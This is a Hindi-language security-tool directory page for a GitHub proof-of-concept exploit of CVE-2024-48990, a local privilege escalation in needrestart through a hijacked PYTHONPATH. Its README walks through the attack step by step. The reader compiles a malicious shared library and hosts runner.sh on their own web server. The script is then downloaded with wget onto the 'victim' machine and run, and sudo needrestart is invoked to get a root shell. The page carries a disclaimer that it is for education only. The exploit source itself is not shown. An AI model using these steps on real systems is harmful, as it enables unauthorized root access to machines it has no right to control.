Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-48990 — CVE-2024-48990 के बारे में PoC। Qualys ने खोजा कि needrestart, संस्करण 3.8 से पहले, स्थानीय हमलावरों को needrestart को attacker-नियंत्रित PYTHONPATH पर्यावरण चर के साथ Python इंटरप्रेटर चलाने के लिए धोखा देकर रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है। (NIST) | Kitploit
उपकरण/GitHubGitHub/grecosamuel/cve-2024-48990
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

CVE-2024-48990 के बारे में PoC। Qualys ने खोजा कि needrestart, संस्करण 3.8 से पहले, स्थानीय हमलावरों को needrestart को attacker-नियंत्रित PYTHONPATH पर्यावरण चर के साथ Python इंटरप्रेटर चलाने के लिए धोखा देकर रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है। (NIST)

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-48990

[!WARNING] ये फ़ाइलें और जानकारियाँ केवल शैक्षिक उद्देश्य के लिए हैं। लेखक किसी भी दुर्भावनापूर्ण व्यवहार के लिए ज़िम्मेदार नहीं है। दी गई सभी जानकारियाँ किसी भी प्रकार के अपराध या दुरुपयोग को भड़काने के लिए नहीं हैं।

विवरण

Qualys ने पता लगाया कि needrestart, संस्करण 3.8 से पहले, स्थानीय हमलावरों को रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है, जिससे needrestart को हमलावर-नियंत्रित PYTHONPATH पर्यावरण चर के साथ Python इंटरप्रेटर चलाने के लिए धोखा दिया जाता है। आधिकारिक विवरण के लिए NIST देखें।

PoC

  1. रिपॉजिटरी को git से डाउनलोड करें

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. एक मान्य ELF लाइब्रेरी उत्पन्न करने के लिए exploit.c लाइब्रेरी को कंपाइल करें और इसे __init__.so नाम दें

gcc -shared -fPIC -o __init__.so exploit.c

  1. runner.sh में, पंक्ति 7 और पंक्ति 10 में <IP> और <PORT> को अपने स्वयं के वेब सर्वर के IP और PORT से बदलें।
  2. वेब सर्वर शुरू करें

python3 -m http.server

  1. पीड़ित की मशीन पर runner डाउनलोड करें

wget http://IP:PORT/runner.sh

  1. runner के लिए निष्पादन अनुमति सेट करें

chmod +x runner.sh

  1. स्क्रिप्ट चलाएँ

./runner.sh

  1. needrestart को sudo अनुमति के साथ चलाएँ

sudo needrestart

जब [*] CVE module created पढ़ें तो प्रक्रिया रोकने और अपना शेल पाने के लिए CTRL+C दबाएँ!

टूल डाउनलोड करें